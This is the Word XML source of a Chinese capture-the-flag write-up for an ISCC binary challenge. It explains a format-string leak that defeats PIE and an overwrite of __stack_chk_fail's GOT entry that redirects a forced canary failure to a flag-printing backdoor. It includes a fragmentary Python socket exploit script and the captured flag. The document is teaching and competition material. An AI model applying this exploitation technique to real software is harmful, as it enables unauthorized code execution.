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解题过程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本题提供的附件为64位ELF可执行文件，开启了PIE机制。安全保护方面启用了Canary、NX机制以及Partial</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RELRO。程序的核心交互逻辑位于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">process_emergency_command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数中，该函数会连续两次接收用户的输入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">程序存在两个主要的安全缺陷：首先是直接调用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">printf(buf)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">造成的格式化字符串漏洞；其次是在调用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">read(0, buf, 0x7c)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时，读取的数据长度超出了大小为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0x68 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字节的栈缓冲区，从而引发了栈溢出（越界写入）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过对二进制文件进行静态分析和反汇编，能够发现程序内部预留了一个名为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">system_reboot_comms</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的后门函数。该函数在输出提示信息后，会直接执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">system("cat flag.txt")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在第一阶段的利用中，完全无需进行暴力破解。利用格式化字符串漏洞，通过发送类似</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%20$p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%35$p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">泄露栈上数据，即可精准捕捉到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函数地址和返回地址，进而计算出程序的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PIE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内存基址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在进行本地测试时发现，如果尝试直接覆盖部分返回地址来劫持控制流跳向后门，会导致栈空间未对齐而崩溃；此外，若尝试利用格式化字符串将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fflush@got</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">劫持为后门函数地址，则会由于该后门函数内也调用了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fflush</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，从而引发无限递归问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">因此，更加可靠的利用思路是在第二步交互中，利用格式化字符串将GOT表中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__stack_chk_fail@got</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指针改写为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">system_reboot_comms</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数的真实入口地址。这样一来，当Canary检查失败并触发异常处理时，程序便会以常规的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指令语义跳转并执行后门代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为成功触发上述机制，我们在发送第二次payload时，只需在格式化串利用代码之后附加足够的垃圾数据，确保总输入量大于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 104 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字节即可。这样做的目的是蓄意覆盖并破坏栈上的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Canary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">值，整个过程完全不需要去泄露真实的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Canary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">到底是多少。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">综上所述，该攻击路径只需建立一次网络连接并发送两次数据包，既规避了多线程并发请求，又省去了爆破环节，非常契合本题对远程靶机环境的限制条件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">运行脚本并在远程服务器执行，最终成功获取到了真正的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">flag：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ISCC{62d0908f-196e-4fdf-8a42-9c14e56a7347}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:id="10" w:name="header-n12"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用程序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10009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MAIN_OFF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0x13CC</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">RET2WIN_OFF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0x1229</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">STACK_CHK_FAIL_GOT_OFF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0x4020</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">PRINTF_BUF_ARG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)).encode()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read_until(conn, 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b"&gt;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conn.settimeout(TIMEOUT)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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blob:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        piece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piece: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blob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piece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read_flag(conn):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn.settimeout(TIMEOUT)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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piece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(socket.timeout, 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piece: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blob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piece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blob)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m.group().decode()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blob)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m.group().decode()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align_up(v, step):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calc_base(blob):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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rb"0x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blob)]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0x3CC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0x2F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MAIN_OFF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make_payload(base_addr):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    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RET2WIN_OFF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STACK_CHK_FAIL_GOT_OFF</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">   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(goal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, got),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        ((goal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, got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((goal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, got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writes.sort(key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begin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(writes):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printed)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f"%1$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printed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begin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$hn"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.join(parts).encode()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align_up(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(fmt)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PRINTF_BUF_ARG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begin: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begin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new_start</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">   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(fmt)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packet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.join(struct.pack(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addr)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addr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writes)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(packet)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packet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b"Q"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(packet))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entry():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socket.create_connection((HOST, PORT),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read_until(conn)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn.sendall(LEAK)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    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read_until(conn)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    base_addr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calc_base(leak)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn.sendall(make_payload(base_addr))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(read_flag(conn))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entry()</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:bookmarkStart w:id="11" w:name="header-n14"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ISCC{62d0908f-196e-4fdf-8a42-9c14e56a7347}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2026-05-17T07:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-17T07:44:00Z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